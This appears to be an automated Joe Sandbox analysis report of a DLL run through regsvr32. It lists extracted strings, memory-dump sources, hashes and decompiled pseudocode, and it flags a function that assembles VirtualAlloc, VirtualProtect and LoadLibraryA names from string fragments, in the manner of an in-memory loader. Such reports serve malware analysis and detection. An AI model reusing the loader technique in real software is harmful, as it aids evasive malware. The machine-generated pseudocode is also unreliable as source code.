%, xrefs: 00007FFD1467738F
V, xrefs: 00007FFD146776A7
U, xrefs: 00007FFD14675587
g, xrefs: 00007FFD14675A97
9, xrefs: 00007FFD14675657
y, xrefs: 00007FFD14676187
1, xrefs: 00007FFD14674437
l, xrefs: 00007FFD14678A67
L, xrefs: 00007FFD14676FD7
E, xrefs: 00007FFD14678DAF
(, xrefs: 00007FFD1467511F
{, xrefs: 00007FFD146787DF
^, xrefs: 00007FFD14678C57
K, xrefs: 00007FFD14676917
R, xrefs: 00007FFD14677B87
\, xrefs: 00007FFD14674647
C, xrefs: 00007FFD14678817
9, xrefs: 00007FFD14678B4F
t, xrefs: 00007FFD146781C7
p, xrefs: 00007FFD14675F17
*, xrefs: 00007FFD14676A07
q, xrefs: 00007FFD146770E7
#, xrefs: 00007FFD14674F67
/, xrefs: 00007FFD146745EF
Z, xrefs: 00007FFD1467512F
4, xrefs: 00007FFD14676D5F
*, xrefs: 00007FFD14678227
m, xrefs: 00007FFD14675C2F
U, xrefs: 00007FFD1467636F
b, xrefs: 00007FFD14677D47
X, xrefs: 00007FFD146755C7
&, xrefs: 00007FFD14674997
U, xrefs: 00007FFD14676C3F
G, xrefs: 00007FFD14677337
,, xrefs: 00007FFD14677B07
*, xrefs: 00007FFD1467564F
O, xrefs: 00007FFD14679127
/, xrefs: 00007FFD1467917F
%, xrefs: 00007FFD14676A87
k, xrefs: 00007FFD14677617
t, xrefs: 00007FFD146775BF
6, xrefs: 00007FFD14674A3F
~, xrefs: 00007FFD14677C6F
\, xrefs: 00007FFD14677E7F
8, xrefs: 00007FFD14675AB7
M, xrefs: 00007FFD146759E7
0, xrefs: 00007FFD1467486F
t, xrefs: 00007FFD14675C57
r, xrefs: 00007FFD14674EAF
&, xrefs: 00007FFD1467660F
8, xrefs: 00007FFD146786D7
r, xrefs: 00007FFD14674F77
y, xrefs: 00007FFD14675BDF
n, xrefs: 00007FFD14677417
g, xrefs: 00007FFD14675377
<, xrefs: 00007FFD146741CF
$, xrefs: 00007FFD14674947
", xrefs: 00007FFD14678F77
V, xrefs: 00007FFD146785E7
], xrefs: 00007FFD14677207
z, xrefs: 00007FFD14675ED7
`, xrefs: 00007FFD14677D17
H, xrefs: 00007FFD1467426F
j, xrefs: 00007FFD1467637F
Y, xrefs: 00007FFD146766D7
s, xrefs: 00007FFD1467594F
~, xrefs: 00007FFD146748C7
;, xrefs: 00007FFD14674F0F
{, xrefs: 00007FFD14678917
, xrefs: 00007FFD14675A87
D, xrefs: 00007FFD14678077
#, xrefs: 00007FFD146750DF
H, xrefs: 00007FFD14676E87
5, xrefs: 00007FFD1467783F
g, xrefs: 00007FFD1467504F
), xrefs: 00007FFD14677F8F
k, xrefs: 00007FFD146764C7
C, xrefs: 00007FFD146749B7
4, xrefs: 00007FFD1467657F
P, xrefs: 00007FFD1467527F
1, xrefs: 00007FFD146788F7
w, xrefs: 00007FFD14675027
a, xrefs: 00007FFD14676E4F
:, xrefs: 00007FFD14675C1F
$, xrefs: 00007FFD14675D77
m, xrefs: 00007FFD14674EF7
%, xrefs: 00007FFD14676427
@, xrefs: 00007FFD146743D7
S, xrefs: 00007FFD146757BF
+, xrefs: 00007FFD14674B07
^, xrefs: 00007FFD146790BF
G, xrefs: 00007FFD14677787
e, xrefs: 00007FFD14679047
R, xrefs: 00007FFD14677637
u, xrefs: 00007FFD146768AF
%, xrefs: 00007FFD14678A57
g, xrefs: 00007FFD1467753F
^, xrefs: 00007FFD14677FEF
%, xrefs: 00007FFD14677E3F
M, xrefs: 00007FFD146782BF
#, xrefs: 00007FFD14678807
W, xrefs: 00007FFD14676A4F
_, xrefs: 00007FFD146768BF
k, xrefs: 00007FFD14678627
m, xrefs: 00007FFD14675BD7
p, xrefs: 00007FFD146779B7
5, xrefs: 00007FFD14676C7F

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 0-872547024
Opcode ID: 57e8fa9dde08a44e44cf3e05f934339bdaee059bb4fa8682c4dcb401922b9f73
Instruction ID: 6ecef02d0f67fe487222953fa6641238727e640174a99ed733ae221fc952d921
Opcode Fuzzy Hash: 57e8fa9dde08a44e44cf3e05f934339bdaee059bb4fa8682c4dcb401922b9f73
Instruction Fuzzy Hash: 19A34F1250DBC1C9E332C23CA4587CFAE9193A3319F484299D3E41AADBC7AE8155DF67

Uniqueness

Uniqueness Score: -1.00%

Function 01F50000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 01F50344
VirtualAlloc.KERNELBASE ref: 01F5038A
VirtualProtect.KERNELBASE ref: 01F5085C
RtlAddFunctionTable.KERNEL32 ref: 01F508E9

Strings

Virt, xrefs: 01F500AD
Virt, xrefs: 01F500C5
ct, xrefs: 01F500DD
temI, xrefs: 01F5011F
eSys, xrefs: 01F50117
aryA, xrefs: 01F500A5
Slee, xrefs: 01F50084
ncti, xrefs: 01F50141
onTa, xrefs: 01F50148
RtlA, xrefs: 01F50133
rote, xrefs: 01F500D5
ualA, xrefs: 01F500B5
ddFu, xrefs: 01F5013A
GetN, xrefs: 01F50107
nf, xrefs: 01F50127
hIns, xrefs: 01F500EB
tion, xrefs: 01F500F9
ualP, xrefs: 01F500CD
lloc, xrefs: 01F500BD
Flus, xrefs: 01F500E4
Cach, xrefs: 01F50100
ativ, xrefs: 01F5010F
o, xrefs: 01F5012E
Libr, xrefs: 01F5009D
Load, xrefs: 01F50095
truc, xrefs: 01F500F2

Memory Dump Source

Source File: 00000003.00000002.260363405.0000000001F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f50000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 998211078-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: e6ebcf277e1117eefc77502c8d764e2bb37ad1d7ae84429dfdade3f195c0100e
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 1C520130A18B09CBD759DF18D8856BAB7E0FB84304F14462DE98BC7252DF35E542CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14664194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFD7FFD14664194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x146641d5;
				if (_t5 == 0) goto 0x146641c9;
				if (_t5 == 0) goto 0x146641bc;
				if (__edx == 1) goto 0x146641b5;
				return 1;
			}

0x7ffd14664198
0x7ffd1466419a
0x7ffd1466419f
0x7ffd146641a4
0x7ffd146641a9
0x7ffd146641b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFD146641BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFD14664211
__scrt_fastfail.LIBCMT ref: 00007FFD1466422D
_RTC_Initialize.LIBCMT ref: 00007FFD14664245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFD14664267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFD14664283
__scrt_release_startup_lock.LIBCMT ref: 00007FFD146642AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFD146642CD

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 97385665d71bbd758ec81b59cdfec24f851c7aa8cb5300423eda6cb53b62fd71
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: 1A517A30F0CE4385FA14AB71E8F12F96696AF573BCF544035E94D4729BCE2CA4858B08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14661580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0x14661693;
				r8d = 0;
				E00007FFD7FFD14661910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0x1466160a;
				E00007FFD7FFD14661850(_a16);
				_v56 = _t49;
				E00007FFD7FFD14661850(_a8);
				if ((E00007FFD7FFD14662A50(_t49, _v56) & 0x000000ff) == 0) goto 0x1466160a;
				E00007FFD7FFD14661850(_a16);
				E00007FFD7FFD14661870(_t49, _a8, _t49);
				E00007FFD7FFD14661850(_a16);
				_v48 = _t49;
				E00007FFD7FFD14661850(_a8);
				if ((E00007FFD7FFD14662A50(_t49, _v48) & 0x000000ff) == 0) goto 0x1466167a;
				E00007FFD7FFD14661A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFD7FFD14661AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFD7FFD14662A90(E00007FFD7FFD14662A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0x14661693;
				E00007FFD7FFD14662B00(_t41, _a16);
				return E00007FFD7FFD14661F00(_t49, _a8, _t49);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146615F6

Part of subcall function 00007FFD14661870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFD146615E4

Part of subcall function 00007FFD14662A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFD14662A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFD14661630

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: e333756b94404862e3bfe717553feaad19f49959b1c5f44d7ec4b73a9904fa37
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: FE31CF3175DE4581EA50EB32E4A14FB6351EBC77F8F005535E98E937AACE2CE4418B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFD7FFD14662600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFD7FFD14662830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0x14662659;
				_v120 = _a16;
				goto 0x14662736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFD7FFD14662150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0x14662696;
				goto 0x14662736;
				E00007FFD7FFD14662150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFD7FFD14662830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFD7FFD14662150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0x14662724;
				E00007FFD7FFD14662150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFD7FFD14662150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0x14662736;
				E00007FFD7FFD14662830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD146628E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0x14662771;
				if (_a24 <= 0) goto 0x146627b0;
				_t82 = E00007FFD7FFD146618F0(_t121, _a8);
				_v40 = _t121;
				E00007FFD7FFD14662C00(_t82, _v112);
				E00007FFD7FFD146611E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFD7FFD14661910(1, _t121, _a8, _a24);
				E00007FFD7FFD14662BC0(E00007FFD7FFD14662190(_a8), _t121);
				_v32 = _t121;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD14662C10(_t121, _t121, _v32,  &_v112);
				E00007FFD7FFD14662150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFD7FFD146623A0(_t121, _a8, _a24);
			}

APIs

Part of subcall function 00007FFD14662830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466283E
Part of subcall function 00007FFD14662830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFD1466284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFD1466275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14662784
char_traits.LIBCPMTD ref: 00007FFD146627AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146627E4
construct.LIBCPMTD ref: 00007FFD146627F9

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: 341b945a5b9cfe8f8123036e7bd69e5fcb8b53c55adc900dd385b9a669f6f83f
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: 1D51C03271DF8585E760EB65E4A13AAA360F7CA7A4F404135EACD87B59DF3CD4108B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14661910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0x14661930;
				goto 0x146619f1;
				E00007FFD7FFD14662150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x146619f1;
				E00007FFD7FFD14662190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFD7FFD14662BC0(E00007FFD7FFD14662190(_a8), _t47);
				_v32 = _t47;
				E00007FFD7FFD14661850(_a8);
				_t32 = E00007FFD7FFD14662BD0(_t47, _v32);
				if (_a24 <= 0) goto 0x146619bd;
				E00007FFD7FFD14662C00(_t32, _v40);
				_v24 = _t47;
				E00007FFD7FFD14662190(_a8);
				E00007FFD7FFD146611E0(_t47, _v24, _a24);
				E00007FFD7FFD14662150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFD7FFD14661850(_a8);
				E00007FFD7FFD14662100(_t49, _v40, _v16); // executed
				E00007FFD7FFD14662150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFD7FFD146623A0(_t49, _a8, _a24);
			}

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661972
type_info::_name_internal_method.LIBCMTD ref: 00007FFD14661982
char_traits.LIBCPMTD ref: 00007FFD146619B8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146619D7
_aligned_msize.LIBCMTD ref: 00007FFD146619EC

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: 62868d3bffd1e7b4325b788330e43bc6c8e83ab98647e72ee2d51d06cbecfdee
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 99218472B1DE8181EB50EBA1E4A12AEA760FBC77F8F000535FA8D4775ADE6CD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146613A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFD7FFD146613A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0x146613cd;
				E00007FFD7FFD14669764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0x14661475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0x14661409;
				E00007FFD7FFD14669764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0x14661435;
				E00007FFD7FFD14669764();
				if (_v40 - _v32 - 8 >= 0) goto 0x14661450;
				E00007FFD7FFD14669764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0x1466146b;
				E00007FFD7FFD14669764();
				_a8 = _v32;
				0x14664184(); // executed
				return __eax / _a24;
			}

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD146613C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD1466144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661466

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
